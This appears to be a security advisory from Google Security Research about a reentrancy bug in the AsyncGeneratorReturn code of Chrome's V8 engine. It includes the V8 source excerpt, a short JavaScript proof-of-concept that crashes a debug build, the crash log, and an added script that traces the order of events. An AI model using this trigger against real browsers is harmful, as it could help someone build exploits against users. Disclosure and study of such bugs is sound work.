Chrome V8 JIT – ‘AwaitedPromise’ Update Bug

Authors: Google Security Research    Risk: High

CVE: NO                              0day: Update Bug

0day-id: 0DAY-17604                  Date: 2018-04-26


Chrome V8 is Google’s open source high-performance JavaScript engine, written in C++ and used in Google Chrome, the open source browser from Google, and in Node.js, among others. It implements ECMAScript as specified in ECMA-262, and runs on Windows 7 or later, macOS 10.5+, and Linux systems that use IA-32, ARM, or MIPS processors. V8 can run standalone, or can be embedded into any C++ application. More information can be found on V8’s public wiki.


Here's a snippet of AsyncGeneratorReturn:

  Node* const context = Parameter(Descriptor::kContext);
  Node* const outer_promise = LoadPromiseFromAsyncGeneratorRequest(req);
  // Await() resolves a native promise with `value`. For a thenable this reads
  // value.then, which can run user JavaScript before Await() returns.
  Node* const promise =
      Await(context, generator, value, outer_promise, AwaitContext::kLength,
            init_closure_context, var_on_resolve.value(), var_on_reject.value(),
            is_caught);
  // The awaited promise is recorded on the generator only after Await() has
  // returned, so whatever user script stored there in the meantime is overwritten.
  CSA_SLOW_ASSERT(this, IsGeneratorNotSuspendedForAwait(generator));
  StoreObjectField(generator, JSAsyncGeneratorObject::kAwaitedPromiseOffset,
                   promise);
The Await method calls ResolveNativePromise, which calls InternalResolvePromise, which can run user JavaScript through a "then" getter on the value being awaited. That script runs before the StoreObjectField above has recorded the awaited promise on the generator, so it can re-enter the generator and get a different AwaitedPromise stored; as soon as Await returns, the outer call overwrites that field, leaving the generator in an inconsistent state. In the debug build below this shows up as a failed IsNotUndefined(request) assertion, i.e. a request being taken from a queue that is already empty.
PoC:

async function* asyncGenerator() {
}

let gen = asyncGenerator();
gen.return({
    get then() {
        // Runs from inside Await(), before AsyncGeneratorReturn has stored
        // the awaited promise on the generator.
        delete this.then;
        // Re-enter the generator while the outer return is still in flight;
        // the awaited promise this call installs is overwritten when the
        // outer AsyncGeneratorReturn resumes.
        gen.return();
    }
});
Log in debug mode:
abort: CSA_ASSERT failed: IsNotUndefined(request) [../../src/builtins/]
==== JS stack trace =========================================
Security context: 0x2b29083a3a71 <JSObject>#0#
    2: /* anonymous */(this=0x19b7b0603721 <JSGlobal Object>#1#,0x19b7b060d139 <Object map = 0x189055388c91>#2#)
==== Details ================================================
[2]: /* anonymous */(this=0x19b7b0603721 <JSGlobal Object>#1#,0x19b7b060d139 <Object map = 0x189055388c91>#2#) {
// optimized frame
--------- s o u r c e   c o d e ---------
<No Source>
==== Key         ============================================
 #0# 0x2b29083a3a71: 0x2b29083a3a71 <JSObject>
 #1# 0x19b7b0603721: 0x19b7b0603721 <JSGlobal Object>
 #2# 0x19b7b060d139: 0x19b7b060d139 <Object map = 0x189055388c91>
Received signal 4 ILL_ILLOPN 7fb143ae2781
==== C stack trace ===============================
[end of stack trace]
Illegal instruction
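The window the report relies on is observable from plain JavaScript on any spec-conformant engine: resolving the value passed to gen.return() reads its `then` property synchronously, so a `then` getter runs inside the engine's resolution path, before the outer call has returned, and can call back into the generator. The following is an added example, not code from the original report or from V8; it only records the order of events (on a fixed engine the nested request is simply queued and nothing crashes). The names trace, probeReentrancy and thenable are this example's own.

```javascript
// Added example, not from the original report or from V8. Shows that a
// `then` getter on the awaited value runs synchronously inside
// gen.return(), before that call returns, and can re-enter the generator.

function probeReentrancy() {
  const trace = [];
  let inner; // promise returned by the nested gen.return() made from the getter

  async function* asyncGenerator() {
    // Body never runs: the generator stays in its start state and every
    // request is handled by the async-generator machinery itself.
  }
  const gen = asyncGenerator();

  const thenable = {
    get then() {
      // We are inside the engine's promise-resolution path for the outer
      // gen.return(thenable) call, which has not returned yet.
      trace.push("then getter: running inside resolution");
      // Remove the accessor so any later resolution of this object sees a
      // plain value instead of invoking the getter again.
      delete this.then;
      // Re-enter the generator while the outer request is still in flight.
      // A conformant engine queues this second request; the V8 build in the
      // report let it install its own awaited promise, which the outer call
      // then overwrote.
      inner = gen.return("from getter");
      trace.push("then getter: inner return enqueued");
      return undefined; // not callable, so the object is treated as a value
    },
  };

  trace.push("calling gen.return(thenable)");
  const outer = gen.return(thenable);
  trace.push("gen.return(thenable) returned");

  return { trace, outer, inner };
}

// Stand-alone run: the trace shows the getter and the nested return both
// happened before the outer gen.return() returned; both requests then settle.
(async () => {
  const { trace, outer, inner } = probeReentrancy();
  console.log(trace.join("\n"));
  console.log("outer:", await outer);
  console.log("inner:", await inner);
})();
```

The same ordering is what the PoC above exploits: everything inside the getter executes between Await() resolving the value and AsyncGeneratorReturn writing kAwaitedPromiseOffset.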

